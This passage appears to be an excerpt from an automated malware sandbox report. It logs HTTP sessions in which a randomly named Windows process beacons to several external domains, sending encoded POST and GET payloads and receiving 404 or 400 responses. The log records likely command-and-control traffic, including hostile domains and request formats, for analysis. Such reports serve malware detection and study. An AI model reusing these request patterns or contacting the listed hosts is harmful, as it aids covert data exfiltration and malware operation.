                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4e 30 61 36 6d 72 38 72 68 4c 44 75 73 4c 49 67 4c 33 68 61 6b 6d 4e 76 68 58 33 42 56 58 54 34 59 38 68 31 34 2f 4a 79 48 59 48 6e 33 48 44 43 6e 32 41 46 44 62 6d 63 36 42 78 71 6a 45 46 46 66 37 41 39 4a 47 74 76 6d 35 78 6e 48 34 2f 44 36 38 6b 43 70 70 6f 57 34 6d 4d 44 48 71 51 46 63 6c 41 33 65 58 72 32 30 77 4a 72 67 6c 64 36 48 31 79 6b 70 34 67 76 78 31 6b 76 6e 6e 76 7a 44 4c 4f 49 73 4f 65 6a 5a 6d 56 39 48 61 57 67 6c 50 58 59 2b 47 6b 65 5a 5a 68 43 7a 67 38 38 4a 4b 39 49 6e 32 66 54 7a 2b 59 50 56 36 59 70 4a 7a 6d 39 38 4b 64 6f 54 41 4c 66 74 6b 4f 6d 59 64 7a 6f 71 48 74 65 53 49 6d 63 78 75 78 4d 35 55 69 45 4a 4b 6d 65 50 6b 42 45 32 7a 44 51 46 69 75 34 79 67 58 39 4a 69 34 74 34 6a 64 5a 32 73 65 49 44 4f 2f 65 30 71 54 74 36 48 37 69 68 6d 44 74 78 42 59 72 46 78 37 66 47 54 47 56 2b 6a 67 4a 41 45 74 32 59 64 44 2f 68 37 49 33 47 51 68 63 39 43 32 46 70 6c 72 75 73 66 45 2f 57 39 77 41 49 35 69 4c 30 41 2b 55 57 61 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=4zjSVCBXNBiBN0a6mr8rhLDusLIgL3hakmNvhX3BVXT4Y8h14/JyHYHn3HDCn2AFDbmc6BxqjEFFf7A9JGtvm5xnH4/D68kCppoW4mMDHqQFclA3eXr20wJrgld6H1ykp4gvx1kvnnvzDLOIsOejZmV9HaWglPXY+GkeZZhCzg88JK9In2fTz+YPV6YpJzm98KdoTALftkOmYdzoqHteSImcxuxM5UiEJKmePkBE2zDQFiu4ygX9Ji4t4jdZ2seIDO/e0qTt6H7ihmDtxBYrFx7fGTGV+jgJAEt2YdD/h7I3GQhc9C2FplrusfE/W9wAI5iL0A+UWaBYRzWJ+b0Vs/fw4KCw3sOes9SUy+VD6UjbLyMnTzgRES/Jh9UuhfvHfUzk24DYAVDV9I8wzhSXm4nbGupqNHKLxTniWyle1kAcIk71L02iJzMl2bLm7+FDdGm9xYA4iLHX6FXMtsgHQ4xaxWqtkEArpE7FxQcbr/nAJZ7sdlE8bOw3wDc0t1Z98nbhkZKBc1GN02VYYkD2Zhy8tX7iZDnn/YyTWYGihDrdEHZpReUdLW+1UltTCFqrAQGy40gzyesSOlgZt1HZhT5Y4CBhjOIicrscAQOn19TFUn6Z2qcEbJGtqrnwd6HL/mu3xfUGqPVpkiGkXeYFz0OXYPgZyxJ5bDz5nkLLju0X0wnGtKWGYH10vT9ZS3LFicEQtH1ddcD6cGfdxwWktmI4/UkJIywOBi1vA3wEthL5qv0Mv0gBCNIwAFWBuM6in/HDgTXam3J2iKoR7GDvCSw73ZnRp3xVK9Wvg7tBp6pEKX1DzKRswlvrBGJvLabRyC9FKV1STqFpkZB8hIjcn4jg5sx1jQAfn3qbl+rs1zaIHIKh6q8a9jdSh8gfJnhiFi0QLrpUpvRPFvDnUa4BFR2ulbzpA8QfhkCCq6clvewtCDLWvNcqDbeoP5rL+BgR7X/xbFa/Eh6DLuGx+aB7IF+4yoLvnas5QCzBXYSPvrCh [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.64999547.83.1.90806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:46.996006966 CET518OUTGET /hf4a/?-0-L9xY=1xLyW3NuagjZMWLakpM9q9Dlq5M4Mwlw3Xlkp07XGkfoNpNQ7ONbaOfooFbWkXkUauDqyi9rr3xWBLUVS1AbncpoQpr6kYxUu+wU3Tx1ZPQnZRQ2cE7e7gBiti52HSebvZ5SsDs=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.ripbgs.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:11:48.624751091 CET139INHTTP/1.1 567 unknown
                                                                    Server: nginx/1.18.0
                                                                    Date: Fri, 10 Jan 2025 08:11:48 GMT
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                    Data Ascii: Request too large


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.649997162.0.236.169806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:10.583653927 CET790OUTPOST /t0rn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.explorevision.xyz
                                                                    Origin: http://www.explorevision.xyz
                                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 56 66 57 44 42 69 76 6c 73 70 52 73 78 69 74 66 4b 33 77 6f 6b 55 72 35 54 62 4a 73 41 48 6b 4b 56 38 45 42 47 49 4e 7a 71 66 44 34 6e 58 68 78 6d 4f 7a 58 37 6e 74 58 4b 44 57 59 50 36 78 2b 4e 46 62 34 4f 30 39 68 68 54 33 46 72 4d 66 2b 33 4f 41 6c 55 52 52 42 6d 2f 70 52 68 54 2f 5a 2f 44 37 6a 4a 4f 68 50 4b 6e 64 50 48 75 31 43 55 54 59 37 38 2b 54 57 61 42 5a 46 41 72 32 57 4d 53 36 4b 44 39 4c 51 77 51 52 34 49 38 4d 30 4f 78 58 6f 47 48 6b 4d 42 50 38 56 6f 48 48 69 45 78 77 63 64 55 31 4e 71 53 57 53 69 55 71 33 63 74 78 54 76 64 47 2f 4b 39 62 67 6f 39 4a 4a 34 4a 77 45 36 6a 4b 4b 39 72 63 52
                                                                    Data Ascii: -0-L9xY=VfWDBivlspRsxitfK3wokUr5TbJsAHkKV8EBGINzqfD4nXhxmOzX7ntXKDWYP6x+NFb4O09hhT3FrMf+3OAlURRBm/pRhT/Z/D7jJOhPKndPHu1CUTY78+TWaBZFAr2WMS6KD9LQwQR4I8M0OxXoGHkMBP8VoHHiExwcdU1NqSWSiUq3ctxTvdG/K9bgo9JJ4JwE6jKK9rcR
                                                                    Jan 10, 2025 09:12:11.142097950 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:11 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.649998162.0.236.169806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:13.634260893 CET814OUTPOST /t0rn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.explorevision.xyz
                                                                    Origin: http://www.explorevision.xyz
                                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 56 66 57 44 42 69 76 6c 73 70 52 73 6a 54 64 66 4d 57 77 6f 6a 30 72 2b 50 4c 4a 73 4a 6e 6c 4e 56 38 41 42 47 4a 35 64 71 74 6e 34 6d 7a 6c 78 6e 4e 72 58 2b 6e 74 58 41 6a 57 64 4c 36 78 31 4e 46 66 61 4f 30 52 68 68 51 4c 46 72 4a 6a 2b 32 39 6f 6d 53 52 52 35 79 50 70 58 76 7a 2f 5a 2f 44 37 6a 4a 4f 30 6f 4b 6e 56 50 41 65 46 43 4f 79 59 30 30 65 54 56 64 42 5a 46 45 72 32 61 4d 53 36 73 44 35 4b 33 77 54 35 34 49 2b 45 30 4f 67 58 72 64 33 6b 4f 4d 76 39 33 67 69 65 41 4b 53 77 66 61 46 4a 51 32 51 75 58 71 43 33 74 41 65 78 77 39 4e 6d 39 4b 2f 44 53 6f 64 4a 6a 36 4a 49 45 6f 30 47 74 79 66 35 79 32 48 45 46 71 4e 68 72 44 4e 64 6f 43 37 56 39 37 39 4f 33 4b 67 3d 3d
                                                                    Data Ascii: -0-L9xY=VfWDBivlspRsjTdfMWwoj0r+PLJsJnlNV8ABGJ5dqtn4mzlxnNrX+ntXAjWdL6x1NFfaO0RhhQLFrJj+29omSRR5yPpXvz/Z/D7jJO0oKnVPAeFCOyY00eTVdBZFEr2aMS6sD5K3wT54I+E0OgXrd3kOMv93gieAKSwfaFJQ2QuXqC3tAexw9Nm9K/DSodJj6JIEo0Gtyf5y2HEFqNhrDNdoC7V979O3Kg==
                                                                    Jan 10, 2025 09:12:14.211534023 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:14 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.649999162.0.236.169806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:16.227170944 CET1827OUTPOST /t0rn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.explorevision.xyz
                                                                    Origin: http://www.explorevision.xyz
                                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 56 66 57 44 42 69 76 6c 73 70 52 73 6a 54 64 66 4d 57 77 6f 6a 30 72 2b 50 4c 4a 73 4a 6e 6c 4e 56 38 41 42 47 4a 35 64 71 74 76 34 6e 47 78 78 6e 74 58 58 39 6e 74 58 65 7a 57 63 4c 36 78 53 4e 42 4c 65 4f 30 73 63 68 57 50 46 71 72 62 2b 78 4d 6f 6d 48 68 52 35 74 66 70 53 68 54 2b 62 2f 44 72 6e 4a 4f 6b 6f 4b 6e 56 50 41 64 64 43 41 7a 59 30 35 2b 54 57 61 42 5a 5a 41 72 33 48 4d 53 6a 58 44 35 66 41 78 69 5a 34 49 65 55 30 4e 53 2f 72 52 33 6b 49 50 76 39 52 67 69 61 32 4b 53 74 75 61 46 74 32 32 51 61 58 35 32 36 71 61 74 35 42 6b 65 36 4d 53 66 2f 30 78 4e 64 58 37 4a 34 48 6f 6b 57 44 34 63 4e 6b 35 69 77 66 6d 2b 34 35 4b 4c 78 6a 4a 4f 34 49 79 4d 33 6b 51 30 57 30 49 77 69 6e 74 76 70 59 42 6c 65 74 2b 52 67 48 4b 51 75 64 72 4f 4f 59 37 75 51 75 4a 66 70 41 62 30 65 37 6d 30 67 61 4c 79 31 71 71 34 67 78 31 5a 65 63 4f 6a 48 32 31 44 4a 78 49 77 51 4d 54 55 6a 64 79 54 4d 66 42 6d 69 67 63 68 4f 6a 48 6f 74 52 75 79 65 63 35 4e 56 5a 33 45 2b 67 79 4e 71 58 42 74 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=VfWDBivlspRsjTdfMWwoj0r+PLJsJnlNV8ABGJ5dqtv4nGxxntXX9ntXezWcL6xSNBLeO0schWPFqrb+xMomHhR5tfpShT+b/DrnJOkoKnVPAddCAzY05+TWaBZZAr3HMSjXD5fAxiZ4IeU0NS/rR3kIPv9Rgia2KStuaFt22QaX526qat5Bke6MSf/0xNdX7J4HokWD4cNk5iwfm+45KLxjJO4IyM3kQ0W0IwintvpYBlet+RgHKQudrOOY7uQuJfpAb0e7m0gaLy1qq4gx1ZecOjH21DJxIwQMTUjdyTMfBmigchOjHotRuyec5NVZ3E+gyNqXBtzdW1ej9Bw8Rt2CVQsydTCEKvAs+CqEsy/XhNZfhELPrXherQ/X7hWxJxCmHWcs468x2ECnIGE3uCZ3HX+oosU99YYViY0GU2172Hlu95qVswYXZPQwR2szX8GAVpGD9DDXN2MS2XXEvsYgj52u2l2BVZPLyRxxqpSxixjetY29J8MO9wBLXMwTY9QT9Ek8OV57T9ehy2NZ0e1fJrw1a4pygHV4wBbei0rDJog1fHu24MXbdZ+GjYLPrfUysXwPmlI/srMqDkQuZ1uC7E8N2nsDWskaCeoHpTB3wmLjZHbqiHgYlwGxXR0y6L9sQFLvHp39PGg7jBa3JBXcEQZSQ2//Ld2VhEH/k6oyvFWfPdhHcuI/HIWGpiGK51/fDuY1zKdSSYo5W3Y96TDw0jvYn8YVes+DiS9Pshhe+tVMhj6dz1sCHe/ebCSrqafD8KNHF6fH9AVluPnAUkQzkbtckTtRbQS94Kh1bCaCN+ilwSldFPuFerv6CNGs8BakDA1d6UF71O4lGeCO69p1+xyVin3p/oPSaohVFghMLErsvkvAOawaPHeMVAKPa5XHmG6TgWnWp2MLEI60hbJtPH1cBbUxjq4TSxNUY65JMlzPjo2aieKrV+LxezclCjXAbEq3eZSmvLesWkCVnb31xptDyHn3NPOEtanOUupY [TRUNCATED]
                                                                    Jan 10, 2025 09:12:16.804718018 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:16 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.650000162.0.236.169806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:18.766303062 CET524OUTGET /t0rn/?Mn=PdO8wZnxGnZX&-0-L9xY=Yd+jCUH61c4a7Q1+Dkx6pQX3S61LKXAtFbIeY4NO2NPuq2cKreHL8mdEdFCyOqVBfEq7A2gNsBXq87HwyvEMJSNDnPhs3w+B9xX6N7MrbCFYPNclLBgQ9fjNZkREdMjUbQytONk= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.explorevision.xyz
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:12:19.334186077 CET548INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:19 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.650001192.186.58.31806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:24.897656918 CET778OUTPOST /wn9b/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.babyzhibo.net
                                                                    Origin: http://www.babyzhibo.net
                                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 69 5a 41 4d 6d 72 35 7a 6a 4f 6d 5a 42 38 41 64 52 48 67 4f 31 53 5a 35 37 6f 48 42 6e 61 47 61 30 77 55 79 38 4b 33 4b 4f 4c 6f 49 62 51 63 37 74 4d 59 31 4b 58 79 53 57 73 46 6a 67 4f 42 39 79 44 7a 72 58 70 61 48 4c 64 52 78 33 39 42 42 49 53 62 65 73 52 4b 6c 63 51 76 2f 4f 38 43 67 30 62 65 6d 69 51 49 31 5a 36 62 47 6e 4a 72 78 71 54 69 2b 51 47 4d 4a 37 67 6f 73 7a 55 70 6d 4a 45 35 42 59 43 4c 30 74 65 6b 76 76 79 64 53 42 67 68 56 30 42 6d 46 32 70 55 6d 31 4c 68 49 64 36 41 4d 43 76 51 51 50 6a 59 59 6f 30 37 7a 53 72 4f 6d 56 32 55 72 4c 51 48 53 62 72 36 2f 6b 79 5a 34 53 61 72 41 65 30 2f 49
                                                                    Data Ascii: -0-L9xY=iZAMmr5zjOmZB8AdRHgO1SZ57oHBnaGa0wUy8K3KOLoIbQc7tMY1KXySWsFjgOB9yDzrXpaHLdRx39BBISbesRKlcQv/O8Cg0bemiQI1Z6bGnJrxqTi+QGMJ7goszUpmJE5BYCL0tekvvydSBghV0BmF2pUm1LhId6AMCvQQPjYYo07zSrOmV2UrLQHSbr6/kyZ4SarAe0/I
                                                                    Jan 10, 2025 09:12:25.801300049 CET190INHTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 08:12:25 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.650002192.186.58.31806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:27.439080954 CET802OUTPOST /wn9b/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.babyzhibo.net
                                                                    Origin: http://www.babyzhibo.net
                                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
